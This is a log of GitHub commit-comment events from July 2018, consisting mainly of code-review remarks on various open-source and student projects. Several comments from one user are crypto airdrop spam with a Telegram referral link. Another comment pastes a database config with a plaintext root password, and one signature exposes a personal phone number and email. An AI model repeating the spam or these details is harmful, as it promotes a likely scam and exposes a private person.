{"id":"8035655398","type":"CommitCommentEvent","actor":{"login":"gamesterrishi"},"repo":{"name":"vzxxbacq/speaker-recognition-papers"},"payload":{"comment":{"id":29880046,"position":473,"line":176,"path":"pyasv/model/ctdnn.py","commit_id":"911f6df468e6724fb13197f0269ebfa144792a42","created_at":"2018-07-30T06:01:46Z","updated_at":"2018-07-30T06:01:46Z","author_association":"NONE","body":"This is some really good work. Thanks for working on an option to switch between no_gpu and multi_gpu. The documentation and modularity of the code is really great. Appreciate the efforts and the time that you have been spending on this project."}},"created_at":"2018-07-30T06:01:46Z"}
{"id":"8035655940","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29880047,"position":null,"line":null,"path":null,"commit_id":"036528905b152b24ee68bae9c5dbf5b608a1b60c","created_at":"2018-07-30T06:01:57Z","updated_at":"2018-07-30T06:01:57Z","author_association":"NONE","body":"убери лишнее из тестов. И пропиши правильные названия методов"}},"created_at":"2018-07-30T06:01:57Z"}
{"id":"8035656797","type":"CommitCommentEvent","actor":{"login":"kibeb"},"repo":{"name":"kibeb/Styles"},"payload":{"comment":{"id":29880049,"position":null,"line":null,"path":null,"commit_id":"9c58c9b1972b15e2c4f1c57c1df710bf402ef449","created_at":"2018-07-30T06:02:14Z","updated_at":"2018-07-30T06:02:14Z","author_association":"OWNER","body":"Make invia.cz show whole reviews."}},"created_at":"2018-07-30T06:02:14Z"}
{"id":"8035657839","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29880051,"position":93,"line":83,"path":"src/main/java/com/minelittlepony/render/ponies/MobRenderers.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T06:02:36Z","updated_at":"2018-07-30T06:02:36Z","author_association":"MEMBER","body":"You already have IValue with a setter/getter. Why do you need a function for this?"}},"created_at":"2018-07-30T06:02:36Z"}
{"id":"8035662365","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29880060,"position":93,"line":83,"path":"src/main/java/com/minelittlepony/render/ponies/MobRenderers.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T06:04:11Z","updated_at":"2018-07-30T06:04:11Z","author_association":"MEMBER","body":"That's just so I don't have to do `MineLittlePony.getConfig().someSetting` over and over. Instead, I can use `PonyConfig::someSetting`"}},"created_at":"2018-07-30T06:04:11Z"}
{"id":"8035663692","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29880065,"position":25,"line":19,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T06:04:39Z","updated_at":"2018-07-30T06:04:39Z","author_association":"MEMBER","body":"By the power of true?"}},"created_at":"2018-07-30T06:04:39Z"}
{"id":"8035665533","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29880068,"position":25,"line":19,"path":"src/main/java/com/minelittlepony/gui/Checkbox.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T06:05:19Z","updated_at":"2018-07-30T06:05:19Z","author_association":"MEMBER","body":"that is xor. `xor true` is essentially a toggle."}},"created_at":"2018-07-30T06:05:19Z"}
{"id":"8035669602","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29880075,"position":45,"line":20,"path":"src/main/java/com/minelittlepony/PonyConfig.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T06:06:45Z","updated_at":"2018-07-30T06:06:45Z","author_association":"MEMBER","body":"I thought they had to be public, non-final for Exposable to work?"}},"created_at":"2018-07-30T06:06:45Z"}
{"id":"8035671003","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29880076,"position":45,"line":20,"path":"src/main/java/com/minelittlepony/PonyConfig.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T06:07:15Z","updated_at":"2018-07-30T06:07:15Z","author_association":"MEMBER","body":"Gson doesn't care. It uses reflection magic to do it."}},"created_at":"2018-07-30T06:07:15Z"}
{"id":"8035678466","type":"CommitCommentEvent","actor":{"login":"Derongan"},"repo":{"name":"0ffz/Spigot-Stamina-and-Climbing-Plugin"},"payload":{"comment":{"id":29880093,"position":20,"line":32,"path":"src/main/java/com/offz/minecraft/staminaclimbing/plugin/Climbing/ClimbBehaviour.java","commit_id":"834a6893b57bc81f94e5bf89054a1c96c75fa975","created_at":"2018-07-30T06:09:53Z","updated_at":"2018-07-30T06:09:53Z","author_association":"NONE","body":"Might be worth pulling this out into its own method for readability"}},"created_at":"2018-07-30T06:09:53Z"}
{"id":"8035680619","type":"CommitCommentEvent","actor":{"login":"Derongan"},"repo":{"name":"0ffz/Spigot-Stamina-and-Climbing-Plugin"},"payload":{"comment":{"id":29880098,"position":44,"line":54,"path":"src/main/java/com/offz/minecraft/staminaclimbing/plugin/Climbing/ClimbBehaviour.java","commit_id":"834a6893b57bc81f94e5bf89054a1c96c75fa975","created_at":"2018-07-30T06:10:38Z","updated_at":"2018-07-30T06:10:38Z","author_association":"NONE","body":"same here"}},"created_at":"2018-07-30T06:10:38Z"}
{"id":"8035685742","type":"CommitCommentEvent","actor":{"login":"Derongan"},"repo":{"name":"0ffz/Spigot-Stamina-and-Climbing-Plugin"},"payload":{"comment":{"id":29880112,"position":13,"line":21,"path":"src/main/java/com/offz/minecraft/staminaclimbing/plugin/Stamina/StaminaTask.java","commit_id":"834a6893b57bc81f94e5bf89054a1c96c75fa975","created_at":"2018-07-30T06:12:26Z","updated_at":"2018-07-30T06:12:26Z","author_association":"NONE","body":"this seems a bit overboard. Do we really need to iterate over ALL players each time? Can't we just store a timestamp and then compare only a single entry each time?"}},"created_at":"2018-07-30T06:12:26Z"}
{"id":"8035688734","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29880119,"position":22,"line":22,"path":"listen2/show_months_equal_30_days.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T06:13:25Z","updated_at":"2018-07-30T06:13:25Z","author_association":"NONE","body":"от души )))\r\n\r\nобычно решение выглядит примерно так:\r\n```ruby\r\nmonths = { \r\n  jan: 31, feb: 28, mar: 31, apr: 30, may: 31, jun: 30, \r\n  jul: 31, aug: 31, sep: 30, oct: 31, nov: 30, dec: 31 \r\n}\r\nmonths.each { |month, days| puts month if days == 30 }\r\n```\r\nок, вопросов нет, сложновато конечно, но рабочий вариант )\r\n"}},"created_at":"2018-07-30T06:13:25Z"}
{"id":"8035697876","type":"CommitCommentEvent","actor":{"login":"BobDokubo2016"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29880130,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T06:16:21Z","updated_at":"2018-07-30T06:16:21Z","author_association":"NONE","body":"c=>c.id ==id is a lamda expression meaning as C approaches c.id the value\nincreases or so\n\nOn Mon, Jul 30, 2018 at 12:15 AM TommyThan <notifications@github.com> wrote:\n\n> So, instead of using foreach to handle, I can use c=> c.id ==id to\n> traverse the list, right ?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mosh-hamedani/vidly-mvc-5/commit/b727a26e1b4b88abe84a8b48208fec537db2ed43#commitcomment-29879336>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT6-NugM3VbFeeMyMDICMvJvgOgitzjyks5uLohEgaJpZM4JEcYW>\n> .\n>\n-- \n*Thanks and regards,*\n*Bobmanuel Ake*\n\n*Phone#: 856-673-6393*\n*EmailAddress: bobattalentcreek@gmail.com <bobattalentcreek@gmail.com>*\n"}},"created_at":"2018-07-30T06:16:21Z"}
{"id":"8035711839","type":"CommitCommentEvent","actor":{"login":"double-beep"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29880196,"position":8,"line":1458,"path":"x86/SearchMacros.asm","commit_id":"1bf7829e68602a267498b1261a81f5c85349e3a2","created_at":"2018-07-30T06:20:49Z","updated_at":"2018-07-30T06:20:49Z","author_association":"NONE","body":"You are right, thanks!"}},"created_at":"2018-07-30T06:20:49Z"}
{"id":"8035745657","type":"CommitCommentEvent","actor":{"login":"jtpedersen"},"repo":{"name":"jtpedersen/openvoronoi"},"payload":{"comment":{"id":29880247,"position":null,"line":null,"path":null,"commit_id":"63d8ea22f83ad0efe6a247d7acfb189b45f82f53","created_at":"2018-07-30T06:31:38Z","updated_at":"2018-07-30T06:31:38Z","author_association":"OWNER","body":"Yes that is fine\r\n"}},"created_at":"2018-07-30T06:31:38Z"}
{"id":"8035747250","type":"CommitCommentEvent","actor":{"login":"jtpedersen"},"repo":{"name":"jtpedersen/openvoronoi"},"payload":{"comment":{"id":29880249,"position":null,"line":null,"path":null,"commit_id":"63d8ea22f83ad0efe6a247d7acfb189b45f82f53","created_at":"2018-07-30T06:32:08Z","updated_at":"2018-07-30T06:32:08Z","author_association":"OWNER","body":"Thank you for taking it somewhere :+1: "}},"created_at":"2018-07-30T06:32:08Z"}
{"id":"8035750857","type":"CommitCommentEvent","actor":{"login":"kerizane"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29880254,"position":4,"line":71,"path":"tuxemon/core/main.py","commit_id":"7344a0311a788ab7366805a89b5ccc4d73ed8aa6","created_at":"2018-07-30T06:33:14Z","updated_at":"2018-07-30T06:33:14Z","author_association":"CONTRIBUTOR","body":"Won't this break selecting a save from the CLI?"}},"created_at":"2018-07-30T06:33:14Z"}
{"id":"8035751726","type":"CommitCommentEvent","actor":{"login":"andr2000"},"repo":{"name":"andr2000/xen"},"payload":{"comment":{"id":29880256,"position":459,"line":459,"path":"xen/include/public/io/cameraif.h","commit_id":"0ad6d820f3f64fb249bf3634011239da86dd5a63","created_at":"2018-07-30T06:33:30Z","updated_at":"2018-07-30T06:33:30Z","author_association":"OWNER","body":"`operation` is not a part of configuration"}},"created_at":"2018-07-30T06:33:30Z"}
{"id":"8035752782","type":"CommitCommentEvent","actor":{"login":"p2pzyh"},"repo":{"name":"p2pzyh/USERSERVICE-dev.yml"},"payload":{"comment":{"id":29880259,"position":null,"line":null,"path":null,"commit_id":"df93ef57188f9146399280619ac8d9d00c6322b7","created_at":"2018-07-30T06:33:50Z","updated_at":"2018-07-30T06:33:50Z","author_association":"OWNER","body":"123132"}},"created_at":"2018-07-30T06:33:50Z"}
{"id":"8035753175","type":"CommitCommentEvent","actor":{"login":"KalyaniKurnawal"},"repo":{"name":"Mania-123/Programs"},"payload":{"comment":{"id":29880260,"position":1,"line":1,"path":"README.md","commit_id":"b240ea4a3e547bf98cf061abfc7fb81667ca01fe","created_at":"2018-07-30T06:33:59Z","updated_at":"2018-07-30T06:33:59Z","author_association":"NONE","body":"hi sheetal"}},"created_at":"2018-07-30T06:33:59Z"}
{"id":"8035753193","type":"CommitCommentEvent","actor":{"login":"p2pzyh"},"repo":{"name":"p2pzyh/USERSERVICE-dev.yml"},"payload":{"comment":{"id":29880261,"position":null,"line":null,"path":null,"commit_id":"df93ef57188f9146399280619ac8d9d00c6322b7","created_at":"2018-07-30T06:33:59Z","updated_at":"2018-07-30T06:33:59Z","author_association":"OWNER","body":"spring: \r\n    datasource:\r\n      url: jdbc:mysql://localhost/test\r\n      username: root\r\n      password: ps123456\r\n      driver-class-name: com.mysql.jdbc.Driver"}},"created_at":"2018-07-30T06:33:59Z"}
{"id":"8035759127","type":"CommitCommentEvent","actor":{"login":"bitcraft"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29880265,"position":4,"line":71,"path":"tuxemon/core/main.py","commit_id":"7344a0311a788ab7366805a89b5ccc4d73ed8aa6","created_at":"2018-07-30T06:35:51Z","updated_at":"2018-07-30T06:35:51Z","author_association":"COLLABORATOR","body":"If it does, please find another way to implement salecting a save from the GUI.  In my testing with an older build without CBR, i got a crash on startup.  I also think we should be starting from the \"start\" state, not \"load\".  Perhaps test if there is a CLI argument, then push the load state if needed."}},"created_at":"2018-07-30T06:35:51Z"}
{"id":"8035761362","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29880275,"position":24,"line":24,"path":"lesson4/cargo_wagon.rb","commit_id":"a13b0406b61ec1a7035259357c9adf6a487f2e0e","created_at":"2018-07-30T06:36:31Z","updated_at":"2018-07-30T06:36:31Z","author_association":"NONE","body":"Если посмотреть на код подклассов, то они почти одинаковые. Разница только в том, что у пассажирских вагонов занимается 1 место, а у грузовых - произвольное кол-во. Ну и сообщения разные. Подумай, как можно сделать код более универсальным и не дублировать его в подклассах, а вынести в базовый как можно больше."}},"created_at":"2018-07-30T06:36:31Z"}
{"id":"8035765257","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29880285,"position":null,"line":null,"path":null,"commit_id":"ba6b764702254e147f77090b796bbdc476f89f1c","created_at":"2018-07-30T06:37:41Z","updated_at":"2018-07-30T06:37:41Z","author_association":"MEMBER","body":"Damn. Se we rather dug out another source?"}},"created_at":"2018-07-30T06:37:41Z"}
{"id":"8035767350","type":"CommitCommentEvent","actor":{"login":"csomor"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29880287,"position":null,"line":null,"path":null,"commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-30T06:38:17Z","updated_at":"2018-07-30T06:38:17Z","author_association":"CONTRIBUTOR","body":"Dang, I forgot I had to regenerate projects for header-only additions as well, sorry, I'll do so"}},"created_at":"2018-07-30T06:38:17Z"}
{"id":"8035768077","type":"CommitCommentEvent","actor":{"login":"YYG501"},"repo":{"name":"YYG501/first"},"payload":{"comment":{"id":29880288,"position":2,"line":2,"path":"test.txt","commit_id":"28865d774338e27793242ca43bd01ee4b960dd68","created_at":"2018-07-30T06:38:31Z","updated_at":"2018-07-30T06:38:31Z","author_association":"OWNER","body":"test\r\n"}},"created_at":"2018-07-30T06:38:31Z"}
{"id":"8035769141","type":"CommitCommentEvent","actor":{"login":"M-E-Steiner"},"repo":{"name":"M-E-Steiner/cSEM"},"payload":{"comment":{"id":29880290,"position":5,"line":6,"path":"R/test_MGA.R","commit_id":"804d72bd32f18c2390b9c6e9fb849f0b3af0b8cd","created_at":"2018-07-30T06:38:49Z","updated_at":"2018-07-30T06:38:49Z","author_association":"OWNER","body":" @Klesel pease change „.cSem“ to „.object“ to be consistent with other package function arguments."}},"created_at":"2018-07-30T06:38:49Z"}
{"id":"8035769830","type":"CommitCommentEvent","actor":{"login":"KalyaniKurnawal"},"repo":{"name":"KalyaniKurnawal/Programs"},"payload":{"comment":{"id":29880292,"position":3,"line":3,"path":"README.md","commit_id":"ee00f8ca67bfaddf2b71f578e9705f85f964c921","created_at":"2018-07-30T06:39:00Z","updated_at":"2018-07-30T06:39:00Z","author_association":"OWNER","body":"hiii sheetal"}},"created_at":"2018-07-30T06:39:00Z"}
{"id":"8035774621","type":"CommitCommentEvent","actor":{"login":"LinnoBraz"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29880307,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T06:40:23Z","updated_at":"2018-07-30T06:40:23Z","author_association":"NONE","body":"http://t.me/HrbeAirDropBot?start=530942131\n\nEm seg, 30 de jul de 2018 03:27, g18983356634 <notifications@github.com>\nescreveu:\n\n> dsfsdfsdf\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29880220>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnrUO188vv9HGyCqZtZ-iGpTTBlQTwz1ks5uLqdVgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-30T06:40:23Z"}
{"id":"8035775128","type":"CommitCommentEvent","actor":{"login":"chintanjoshi1"},"repo":{"name":"ilearninteractive/ilearn-ginkgo"},"payload":{"comment":{"id":29880310,"position":null,"line":null,"path":null,"commit_id":"47392eb07fd85957b1f25c71b4d67bcdb8fdde97","created_at":"2018-07-30T06:40:32Z","updated_at":"2018-07-30T06:40:32Z","author_association":"COLLABORATOR","body":"@esl4m \r\nFixed by \r\n59a1012f8d0ff7c12a343e2d68cbbc6dfe7a1be1\r\n\r\nand \r\n\r\nb0aa43ae45a871ec75e9d0165ffaf14e370f94f8"}},"created_at":"2018-07-30T06:40:32Z"}
{"id":"8035775981","type":"CommitCommentEvent","actor":{"login":"eunicode"},"repo":{"name":"eunicode/gatsby-tut-4"},"payload":{"comment":{"id":29880312,"position":null,"line":null,"path":null,"commit_id":"6591f6f9c89e627d6de008fd4fd252e446bdff9b","created_at":"2018-07-30T06:40:47Z","updated_at":"2018-07-30T06:40:47Z","author_association":"OWNER","body":"Follow instructions on how to push a Gatsby site to a GitHub repository page here: https://www.gatsbyjs.org/docs/how-gatsby-works-with-github-pages/\r\n1. Install gh-pages package\r\n2. Add a deploy script to package.json. The script will build the site and create a gh-pages branch.\r\n3. Add a prefix path to Gatsby config file. This is bc our site is inside a folder (http://username.github.io/_REPO_).\r\n4. Run `npm run deploy`. All the contents of the public folder will be moved to the repository’s gh-pages branch.\r\n5. Set gh-pages as your GitHub pages source branch in your project's settings.\r\n"}},"created_at":"2018-07-30T06:40:47Z"}
{"id":"8035776576","type":"CommitCommentEvent","actor":{"login":"LinnoBraz"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29880314,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T06:40:58Z","updated_at":"2018-07-30T06:40:58Z","author_association":"NONE","body":"http://t.me/HrbeAirDropBot?start=530942131\n\nEm seg, 30 de jul de 2018 03:40, Linno Braz <srlinobraz@gmail.com> escreveu:\n\n> http://t.me/HrbeAirDropBot?start=530942131\n>\n> Em seg, 30 de jul de 2018 03:27, g18983356634 <notifications@github.com>\n> escreveu:\n>\n>> dsfsdfsdf\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29880220>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AnrUO188vv9HGyCqZtZ-iGpTTBlQTwz1ks5uLqdVgaJpZM4VaEAl>\n>> .\n>>\n>\n"}},"created_at":"2018-07-30T06:40:58Z"}
{"id":"8035780844","type":"CommitCommentEvent","actor":{"login":"skittles9823"},"repo":{"name":"Jashkirat/Feryal-bot"},"payload":{"comment":{"id":29880325,"position":null,"line":null,"path":null,"commit_id":"d57dbb575c6477765c3f05426ee540ff6320a681","created_at":"2018-07-30T06:42:16Z","updated_at":"2018-07-30T06:42:16Z","author_association":"NONE","body":"10/10 wouldn't give @deletescape authorship again"}},"created_at":"2018-07-30T06:42:16Z"}
{"id":"8035781483","type":"CommitCommentEvent","actor":{"login":"nikusha95"},"repo":{"name":"nikusha95/C-"},"payload":{"comment":{"id":29880327,"position":null,"line":null,"path":null,"commit_id":"b10e97c81fb029fb29e276016829ee9e29fcad7b","created_at":"2018-07-30T06:42:27Z","updated_at":"2018-07-30T06:42:27Z","author_association":"OWNER","body":"https://www.amazon.com/clouddrive/share/hESRyUVpQNzZPrGGUOkIn95CJRdlq4qXPSixTFvdblB"}},"created_at":"2018-07-30T06:42:27Z"}
{"id":"8035786759","type":"CommitCommentEvent","actor":{"login":"LinnoBraz"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29880333,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T06:44:02Z","updated_at":"2018-07-30T06:44:02Z","author_association":"NONE","body":"New Airdrop: Harambee Token!!Leveraging on the blockchain technology, Land\nLayBy is building a trusted shared distributed ledger for recording land\nbuying and selling transactions that can never be altered, corrupted,\nforged or replicated in error. Chat with the telegram bot and get 100 HRBE\n($70) and get 150 HRBE ($105) for every referral.\nhttp://t.me/HrbeAirDropBot?start=530942131\n\nEm seg, 30 de jul de 2018 03:40, Linno Braz <srlinobraz@gmail.com> escreveu:\n\n> http://t.me/HrbeAirDropBot?start=530942131\n>\n> Em seg, 30 de jul de 2018 03:40, Linno Braz <srlinobraz@gmail.com>\n> escreveu:\n>\n>> http://t.me/HrbeAirDropBot?start=530942131\n>>\n>> Em seg, 30 de jul de 2018 03:27, g18983356634 <notifications@github.com>\n>> escreveu:\n>>\n>>> dsfsdfsdf\n>>>\n>>> —\n>>> You are receiving this because you commented.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29880220>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AnrUO188vv9HGyCqZtZ-iGpTTBlQTwz1ks5uLqdVgaJpZM4VaEAl>\n>>> .\n>>>\n>>\n"}},"created_at":"2018-07-30T06:44:02Z"}
{"id":"8035788583","type":"CommitCommentEvent","actor":{"login":"Jorys-Paulin"},"repo":{"name":"moonlight-stream/moonlight-stream.github.io"},"payload":{"comment":{"id":29880351,"position":null,"line":null,"path":null,"commit_id":"80e622510188a0d8791f764328893cdde845d0c4","created_at":"2018-07-30T06:44:32Z","updated_at":"2018-07-30T06:44:32Z","author_association":"CONTRIBUTOR","body":"What is this for?"}},"created_at":"2018-07-30T06:44:32Z"}
{"id":"8035790464","type":"CommitCommentEvent","actor":{"login":"M-E-Steiner"},"repo":{"name":"M-E-Steiner/cSEM"},"payload":{"comment":{"id":29880378,"position":14,"line":51,"path":"R/test_MGA.R","commit_id":"804d72bd32f18c2390b9c6e9fb849f0b3af0b8cd","created_at":"2018-07-30T06:45:05Z","updated_at":"2018-07-30T06:45:05Z","author_association":"OWNER","body":"All distance measures are already defined separately in the file helper_distance_measures.R. Try to use them whenever possible. Will make maintenance much easier."}},"created_at":"2018-07-30T06:45:05Z"}
{"id":"8035791356","type":"CommitCommentEvent","actor":{"login":"ZiniaSult"},"repo":{"name":"ZiniaSult/hello"},"payload":{"comment":{"id":29880381,"position":null,"line":null,"path":null,"commit_id":"b0550cf4d70b9ab0f02a6899385d3eca38673c87","created_at":"2018-07-30T06:45:20Z","updated_at":"2018-07-30T06:45:20Z","author_association":"OWNER","body":"Thanks for the clarification. "}},"created_at":"2018-07-30T06:45:20Z"}
{"id":"8035797191","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29880389,"position":null,"line":null,"path":null,"commit_id":"e6ef153938cbb6c6a1a127fe5c58065d03c719fb","created_at":"2018-07-30T06:46:57Z","updated_at":"2018-07-30T06:46:57Z","author_association":"NONE","body":"This looks like 0;5. Am I overlooking something?"}},"created_at":"2018-07-30T06:46:57Z"}
{"id":"8035799694","type":"CommitCommentEvent","actor":{"login":"M-E-Steiner"},"repo":{"name":"M-E-Steiner/cSEM"},"payload":{"comment":{"id":29880396,"position":99,"line":144,"path":"R/test_MGA.R","commit_id":"804d72bd32f18c2390b9c6e9fb849f0b3af0b8cd","created_at":"2018-07-30T06:47:40Z","updated_at":"2018-07-30T06:47:40Z","author_association":"OWNER","body":"Use “.runs “instead of “.permutations”"}},"created_at":"2018-07-30T06:47:40Z"}
{"id":"8035802478","type":"CommitCommentEvent","actor":{"login":"stmuk"},"repo":{"name":"ugexe/zef"},"payload":{"comment":{"id":29880401,"position":null,"line":null,"path":null,"commit_id":"fefc7b16bc7a81473dbf2d069a9497eecdd005a9","created_at":"2018-07-30T06:48:26Z","updated_at":"2018-07-30T06:48:26Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-30T06:48:26Z"}
{"id":"8035806756","type":"CommitCommentEvent","actor":{"login":"darthvoider"},"repo":{"name":"Socutecat/Project_1"},"payload":{"comment":{"id":29880407,"position":48,"line":460,"path":"css/style.css","commit_id":"3b2050bfd67a5b96c6fdef168dfba24cd2653abf","created_at":"2018-07-30T06:49:37Z","updated_at":"2018-07-30T06:49:37Z","author_association":"NONE","body":"у тебя эти значения (5%, 4%, 4%, 72%) не меняются. зачем ты их дублируешь на медии?"}},"created_at":"2018-07-30T06:49:37Z"}
{"id":"8035807302","type":"CommitCommentEvent","actor":{"login":"M-E-Steiner"},"repo":{"name":"M-E-Steiner/cSEM"},"payload":{"comment":{"id":29880408,"position":180,"line":207,"path":"R/test_MGA.R","commit_id":"804d72bd32f18c2390b9c6e9fb849f0b3af0b8cd","created_at":"2018-07-30T06:49:46Z","updated_at":"2018-07-30T06:49:46Z","author_association":"OWNER","body":"When you submit your final testMGA/your functions, all the testing stuff needs to be deleted."}},"created_at":"2018-07-30T06:49:46Z"}
{"id":"8035816516","type":"CommitCommentEvent","actor":{"login":"eunicode"},"repo":{"name":"eunicode/gatsby-tut-4"},"payload":{"comment":{"id":29880424,"position":null,"line":null,"path":null,"commit_id":"34b185a75a0aa3dc0bd51c10da9835ef5d6895bc","created_at":"2018-07-30T06:52:19Z","updated_at":"2018-07-30T06:52:19Z","author_association":"OWNER","body":"Querying for the site title\r\nhttps://www.gatsbyjs.org/tutorial/part-four/#querying-for-the-site-title\r\nhttps://www.gatsbyjs.org/docs/graphql-reference/\r\n\r\n1. Add site metadata to Gatsby config file.\r\n2. Restart the development server\r\n3. Update components to pull/query for data with GraphQL.\r\nGraphQL is a query language (the QL part of its name). If you’re familiar with SQL, it works in a very similar way. Using a special syntax, you describe the data you want in your component and then that data is given to you.\r\n3a. Call `graphql` tag function\r\n3b. Pass query results (data object) to component\r\n"}},"created_at":"2018-07-30T06:52:19Z"}
{"id":"8035819647","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29880427,"position":null,"line":null,"path":null,"commit_id":"e6ef153938cbb6c6a1a127fe5c58065d03c719fb","created_at":"2018-07-30T06:53:10Z","updated_at":"2018-07-30T06:53:10Z","author_association":"OWNER","body":"I thought about it this way:\r\n\r\nit generally changes the Score const and mob calculations into one int 2d array without any further mob calculations. \r\n\r\nPreviously it was S(92, 0), which after mob calculation can be written as:\r\nTrappedRook[][] = {184, 140, 96, 52}, {92, 70, 48, 26}} \r\n\r\nBut im not sure if my thinking is correct."}},"created_at":"2018-07-30T06:53:10Z"}
{"id":"8035822854","type":"CommitCommentEvent","actor":{"login":"M-E-Steiner"},"repo":{"name":"M-E-Steiner/cSEM"},"payload":{"comment":{"id":29880432,"position":104,"line":147,"path":"R/test_MGA.R","commit_id":"804d72bd32f18c2390b9c6e9fb849f0b3af0b8cd","created_at":"2018-07-30T06:54:03Z","updated_at":"2018-07-30T06:54:03Z","author_association":"OWNER","body":"Add call. = FALSE to every stop statement. This avoids cluttering the error message with (mostly) useless information."}},"created_at":"2018-07-30T06:54:03Z"}
{"id":"8035823206","type":"CommitCommentEvent","actor":{"login":"thgrs"},"repo":{"name":"sapcc/openstack-helm"},"payload":{"comment":{"id":29880433,"position":null,"line":null,"path":null,"commit_id":"60fe2707e10b5f75ad801f9388fa5c13fd018166","created_at":"2018-07-30T06:54:09Z","updated_at":"2018-07-30T06:54:09Z","author_association":"CONTRIBUTOR","body":"could be - my primary intention with this was to make openstack-helm deployment work again - helm-charts might need an adjusted fix"}},"created_at":"2018-07-30T06:54:09Z"}
{"id":"8035827214","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29880439,"position":null,"line":null,"path":null,"commit_id":"c0066fa769faa5b3c62faf94fe07f2f5d6e03e44","created_at":"2018-07-30T06:55:13Z","updated_at":"2018-07-30T06:55:13Z","author_association":"OWNER","body":"See https://github.com/snicolet/Stockfish/compare/53239d7...a5304b7 for a discussion about the pawn chain ideas."}},"created_at":"2018-07-30T06:55:13Z"}
{"id":"8035834926","type":"CommitCommentEvent","actor":{"login":"indraakkk"},"repo":{"name":"daring-drogon/drogon-music"},"payload":{"comment":{"id":29880461,"position":null,"line":null,"path":null,"commit_id":"abd88ea90665f15b7773fd50f76570de1e94d026","created_at":"2018-07-30T06:57:17Z","updated_at":"2018-07-30T06:57:17Z","author_association":"CONTRIBUTOR","body":"fixed sequelize initialization"}},"created_at":"2018-07-30T06:57:17Z"}
{"id":"8035836120","type":"CommitCommentEvent","actor":{"login":"emanuelti"},"repo":{"name":"emanuelti/madre"},"payload":{"comment":{"id":29880464,"position":null,"line":null,"path":null,"commit_id":"711cc8230546298000b3f42c197cd4598ef553be","created_at":"2018-07-30T06:57:36Z","updated_at":"2018-07-30T06:57:36Z","author_association":"OWNER","body":"Boa"}},"created_at":"2018-07-30T06:57:36Z"}
